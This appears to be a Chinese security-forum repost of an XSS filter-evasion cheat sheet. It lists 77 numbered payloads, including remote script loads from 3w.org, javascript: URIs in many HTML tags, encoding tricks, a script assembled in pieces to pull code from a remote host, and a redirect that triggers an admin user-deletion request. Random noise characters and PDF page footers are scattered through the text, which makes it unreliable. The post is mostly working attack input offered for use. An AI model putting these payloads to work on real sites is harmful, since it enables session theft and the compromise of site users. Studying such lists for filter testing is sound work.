貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。$ j) h# d* V& g- {) p/ \8 {
(1)普通的XSS JavaScript注入7 y" V& D9 L' y1 K$ A0 L1 ~$ T* O+ ^
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" i9 O) @. x8 K4 N* ^! j+ C
(2)IMG标签XSS使用JavaScript命令' l2 y7 w2 K& [& a2 @. Y
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
. {7 K/ r3 j# [(3)IMG标签无分号无引号$ E8 c, g$ X! }' b; n* P
<IMG SRC=javascript:alert(‘XSS’)>6 y2 B. c2 E V6 ]
(4)IMG标签大小写不敏感6 I$ z# f; C& h- c" k6 R
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ C! w: a9 _8 {) Q1 F$ {# W(5)HTML编码(必须有分号)$ q& e4 t% O. @
<IMG SRC=javascript:alert(“XSS”)>
" m/ U" [' U2 k- I/ L(6)修正缺陷IMG标签- g5 {; B4 V& }9 z, D I) i
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>2 w9 O" Z. T3 t2 ]# ]5 t
h! O& r: l+ m+ `; W
0 p. i! p6 U" \# p(7)formCharCode标签(计算器)
/ f1 Y A+ S3 m& ^. R& ~+ s7 h<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>4 Y2 {* q: [, ?. }( R3 a. L, K
(8)UTF-8的Unicode编码(计算器)
) z/ L! u* z; z( k G! {<IMG SRC=jav..省略..S')>
+ ~7 o1 n ]3 ?2 Z9 j* h(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 e0 l5 ~0 m/ S8 I/ U<IMG SRC=jav..省略..S')>' M5 n$ u. E# L! M/ v; M5 C3 i
(10)十六进制编码也是没有分号(计算器)7 f/ \6 U2 P6 p" B
<IMG SRC=java..省略..XSS')>$ e r, G# W. G9 ], a: T
(11)嵌入式标签,将Javascript分开4 s+ J8 _+ \2 s. L0 d4 c3 p
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( L% \. i$ ?7 u$ j5 k7 D, F' |9 l(12)嵌入式编码标签,将Javascript分开0 K; F/ r8 }$ U; ~7 a2 K0 I' H
<IMG SRC=”jav ascript:alert(‘XSS’);”>- B# o: |+ r a% i2 ^, P
(13)嵌入式换行符1 ]% g# D# X& a/ `4 V, _
<IMG SRC=”jav ascript:alert(‘XSS’);”>2 B; H3 K: ^; U9 |3 w
(14)嵌入式回车
% ] Q$ ~0 D3 p<IMG SRC=”jav ascript:alert(‘XSS’);”> s: h' z3 P8 G
(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ u: C* x% s+ ?/ z& A
<IMG SRC=”javascript:alert(‘XSS‘)”>& D; v C. e) w7 @8 D# v3 z
(16)解决限制字符(要求同页面)1 I/ r2 i+ g* v. f9 L/ q
<script>z=’document.’</script> X" T. i. {" ]: r. X' _9 J/ D1 Q
<script>z=z+’write(“‘</script>
, `9 W7 {; x l; [5 m% {: o<script>z=z+’<script’</script>4 \ _+ a. U6 T: y% I6 E
<script>z=z+’ src=ht’</script>1 ^9 x' R' U; C2 F
<script>z=z+’tp://ww’</script>
) A4 q& b# E' X. p7 F<script>z=z+’w.shell’</script>
8 `# F t" D, z6 @; t$ i8 o7 k<script>z=z+’.net/1.’</script>
5 ~ e/ O* _- m, G<script>z=z+’js></sc’</script>/ p1 C: u9 k1 Q+ S
<script>z=z+’ript>”)’</script>$ i J( z) V5 K9 v# U0 t
<script>eval_r(z)</script># m& n2 z, k$ X( \- f( z
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
: w0 W Z5 ` Z8 n T* c+ w4 rhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
! O- [( H; R0 k! K: j) uperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out. q1 I8 W q# o6 \; `9 r
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ z. w* H5 f- B* u0 |perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out4 x; v! I. ^( t& Q* D) J1 {
(19)Spaces和meta前的IMG标签* T: z- \: t* x) c! B
<IMG SRC=” javascript:alert(‘XSS’);”>
; ^6 P+ _9 X' w(20)Non-alpha-non-digit XSS
' ]. f, l( M2 p. t<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ r- v5 I# g# X. t! X m8 k
(21)Non-alpha-non-digit XSS to 2
4 g# t+ I3 `/ Q5 I: L<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>) q. a% R7 s9 k( M1 E) s h
(22)Non-alpha-non-digit XSS to 3
/ c4 U2 K Y. ? K<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
# l% D6 [0 v1 R$ o5 f) S; F: _(23)双开括号
- k8 X3 I9 A$ Z/ t) l, w( N<<SCRIPT>alert(“XSS”);//<</SCRIPT>) L1 U3 c0 z- y- U9 w6 P. T
(24)无结束脚本标记(仅火狐等浏览器)8 z5 p3 N% H" S( D) f$ g1 c
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>+ [$ m: U, K; a, X% V
(25)无结束脚本标记2) a% q9 b( C1 ^, c# C# N0 [+ F2 l. C
<SCRIPT SRC=//3w.org/XSS/xss.js>6 A' H3 a" r4 X$ m! z' @% J
(26)半开的HTML/JavaScript XSS
: A6 d( T/ i# h2 L% K<IMG SRC=”javascript:alert(‘XSS’)”' o) w* O3 K+ V# y5 x1 m/ V0 ]
(27)双开角括号5 U+ s& K# _$ }3 i. v* E1 c6 N9 n
<iframe src=http://3w.org/XSS.html <
2 U' a$ Y. m+ b0 h) l/ k(28)无单引号 双引号 分号
1 S$ q5 e' o' A5 }" [# P3 t% D<SCRIPT>a=/XSS/$ @& { `. n. n' q, W. ^2 X; B
alert(a.source)</SCRIPT>
9 h! D" V; h3 s. z6 L* L l/ A" U7 F, h(29)换码过滤的JavaScript
2 t1 ?5 h2 H9 F9 a/ K9 D\”;alert(‘XSS’);//
: k) J3 ?1 C( L% |6 h% T(30)结束Title标签
( F- A, ^* E$ i, b$ w/ R l</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% D8 K" E2 R9 [1 l% z! ?
(31)Input Image7 |) P, j0 j7 W& u6 D8 `8 a
<INPUT SRC=”javascript:alert(‘XSS’);”>. V4 L. f) u/ H, w
(32)BODY Image+ D" n* n& {; Z; `) ]2 I6 R- s
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>1 c, `) k1 K; g p$ i
(33)BODY标签
$ P9 p) ?1 j% |; T2 a/ v# A* p: _<BODY(‘XSS’)>* W5 g9 J; B; P/ G+ A. S R
(34)IMG Dynsrc
# H+ _) e/ u; s# D0 R<IMG DYNSRC=”javascript:alert(‘XSS’)”>
( M" b$ i" P; Z5 o6 _(35)IMG Lowsrc
5 N8 d! i, h* R' ]$ j2 n<IMG LOWSRC=”javascript:alert(‘XSS’)”>9 e% g0 g7 c4 X0 D+ m/ {" R
(36)BGSOUND: I* ~/ v% x r
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
, Z* w' K% X# l0 W(37)STYLE sheet
# b v% r+ N; V, P<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
+ l' B5 M3 c+ S4 F# l(38)远程样式表
* Y+ \# w6 M6 n* [& Y; W<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
i$ U3 U# ]5 l/ @6 b) [6 U(39)List-style-image(列表式)$ ~ }# Y: G! L& P/ z; C8 a* o1 b
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS5 x6 y) e& h- a$ X3 L6 n, @
(40)IMG VBscript. q/ Y2 D# a1 N0 ?! J) I
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS, d' k7 U J$ b# t% F( [: g9 d( n
(41)META链接url' C. N) q. V% \0 Y7 M' Y! `
: x% S- E! E) p3 V
8 r2 m b, P* }- b% p: n<META HTTP-EQUIV=”refresh” CONTENT=”0;# Q+ M. M# U6 ?4 t
URL=http://;URL=javascript:alert(‘XSS’);”>
* O. i, L4 D+ [+ y% y( I% D(42)Iframe/ S/ D8 u3 l' D
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
% a$ N4 H& F, e0 C! M5 Y9 \7 A/ u! F4 O(43)Frame5 `) D4 _- d' i
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 u' o/ A6 J+ G* {# q" J9 mhttps://www.t00ls.net/viewthread ... table&tid=15267 3/6) @$ d3 W# r6 g6 [" z( {: C% }
(44)Table8 r% Z7 S) R3 J2 ^
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
1 M+ ~7 U4 e& O/ u+ O/ k(45)TD
& d$ i) _* t' {8 J4 p<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# ?% {+ k8 E4 e4 M& t( H(46)DIV background-image
& j9 Q) I- t( @% Q$ [<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
: j* ]+ i( I# _6 g# }8 R(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
' s3 @& b6 }" {# W. P. `8&13&12288&65279)
9 J, u+ U! e2 _5 z) T! @<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>4 ^ ]3 Y5 W0 n& F5 P
(48)DIV expression
1 O' L/ \% A% w& _0 D9 V$ m<DIV STYLE=”width: expression_r(alert(‘XSS’));”>7 a& b* d1 h( F5 l7 J" g
(49)STYLE属性分拆表达+ D2 ^. W/ z8 _- N: G6 v; z2 @
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>$ t; n4 A. k9 K. Y( D- a
(50)匿名STYLE(组成:开角号和一个字母开头)
5 g, c P; V# d# [+ P* A! S* E; y- R<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>, @* ]: n# @6 v
(51)STYLE background-image
) v; d' o& |4 t8 {: Y2 O' d# O<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
/ B z# H6 j! A& K* ]! eCLASS=XSS></A>
; q$ n, L2 d+ z3 l" ]* D(52)IMG STYLE方式8 Q0 p8 w8 J# K+ e. w) @0 U( t
exppression(alert(“XSS”))’>
! l; r2 |2 q7 g4 l. ~! X3 F$ I9 M/ L(53)STYLE background; a8 u& k# @3 @" [$ s- K: F) l- o
<STYLE><STYLE
" l7 u5 k2 y7 f) f1 Otype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' o- N+ k1 U; g8 W/ T9 @* X4 d(54)BASE
6 l. |# ^; t' }<BASE HREF=”javascript:alert(‘XSS’);//”>
) D! \: ?& J# o j% {(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS! l g6 p( x o& G9 l w
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>* j0 g4 @: M' O1 E* w, z+ U1 u9 Z
(56)在flash中使用ActionScrpt可以混进你XSS的代码
: `3 [( V F7 x oa=”get”;* O' p7 t6 @, B
b=”URL(\”";
6 Y+ Q' s4 J" r- }c=”javascript:”;
6 b, I. R; K! a& I' D4 X* Ad=”alert(‘XSS’);\”)”;" Z1 d. v* H" ~ ~) I5 o$ ^$ g( g
eval_r(a+b+c+d);
( ?! j4 r8 x- R5 M$ ]5 W(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上, I; ]- E3 l- e+ x- Q# @0 w- Z
<HTML xmlns:xss>
! n" N% w' o+ ~) m- Q<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
4 @$ O9 b: Q" O+ F9 t* S/ E<xss:xss>XSS</xss:xss>) m. M" Z9 |! J
</HTML>$ b0 f, j9 p! w) ?( B0 w+ e# j3 N; Q
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
0 _: y9 x! Z. u* L; ?6 z, a<SCRIPT SRC=””></SCRIPT>
) n. E! Q7 Y- \7 c8 N( J(59)IMG嵌入式命令,可执行任意命令3 Y+ B* C: B1 T/ ]
<IMG SRC=”http://www.XXX.com/a.php?a=b”>$ t5 _2 \1 T& G m4 d: j
(60)IMG嵌入式命令(a.jpg在同服务器)
# X5 A8 k! t7 ?# R' c. kRedirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
6 J4 ` I. e/ e0 j! } c6 \(61)绕符号过滤
m+ W: V8 P. z2 C% \5 k- J1 J( Q<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT> O& ?" a7 \% q Z& W( w% T& M" R
(62)
* N% o+ C6 v- j$ g9 F3 v1 H<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>7 |" W' A3 f( S* K" F+ A- I8 x/ R
(63) [. Y! K/ V; T. B' K t
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
- z* E/ j6 H- {) X/ X% ~! k( N b' T(64)0 p0 V. c0 K2 d9 N0 f
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
9 T* S- I( M: m' `% f( o# _(65)% j ^" f Z. H& T- u1 R
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>$ m3 P' c [/ [3 o, q' Y
(66)12-7-1 T00LS - Powered by Discuz! Board3 e7 y* `0 y8 F. a, Q" m( W- @9 K* ?/ V
https://www.t00ls.net/viewthread ... table&tid=15267 4/65 N% K! [$ i. v7 c# ^
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
_! K5 G) x8 J(67)
2 h+ P0 i7 M3 e8 R( r<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>* U" t0 l, n2 g7 b) t9 q
</SCRIPT>
' W, z7 a2 P5 n(68)URL绕行
: H# o$ K) O, s& _3 ^* B<A HREF=”http://127.0.0.1/”>XSS</A>
) ~6 q& l8 u# i6 o4 D(69)URL编码! u7 e4 {8 @: w$ E2 u0 d& _- J
<A HREF=”http://3w.org”>XSS</A>/ p: q% k; K3 w _. w. O
(70)IP十进制, A" V3 B y; A+ `0 o- ^0 q( d
<A HREF=”http://3232235521″>XSS</A>0 B$ [9 N, p7 A6 }, P3 A g1 S
(71)IP十六进制
$ K6 F) b/ L- S( z<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>. t* z! S& z2 d9 G+ q8 s: t& S
(72)IP八进制8 |. u9 M/ D( W, C
<A HREF=”http://0300.0250.0000.0001″>XSS</A>
( K$ y( N( T. U# Z+ d9 g" `4 V/ Q(73)混合编码
& f: `4 R- ?' K<A HREF=”h
* z) S) K7 |9 t" x7 I1 gtt p://6 6.000146.0×7.147/”">XSS</A>
7 ?5 X7 `" e& \7 c0 b; C(74)节省[http:]7 ~9 i9 t# Z Z
<A HREF=”//www.google.com/”>XSS</A>- s- q$ w* X& k& p
(75)节省[www]
" }" L8 R5 f6 v8 u<A HREF=”http://google.com/”>XSS</A>7 b& i ?* b* }& Q
(76)绝对点绝对DNS ?1 o7 G( v# h$ K& A5 e5 @. ]' \
<A HREF=”http://www.google.com./”>XSS</A>2 A) l( G, C0 w) K4 }# p" N% r# _
(77)javascript链接8 T. f9 X$ A5 ?4 m# U3 v Z* E+ R) U
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>, f. B- E5 T' ]
/ W# g$ H% b. K& `9 [
原文地址:http://fuzzexp.org/u/0day/?p=14
( \/ W5 v* Q0 s7 Z& m# o, e P
$ X' J* d" m% h5 j' R5 F% t |
发表于 2013-4-19 19:22:37
收藏
支持
反对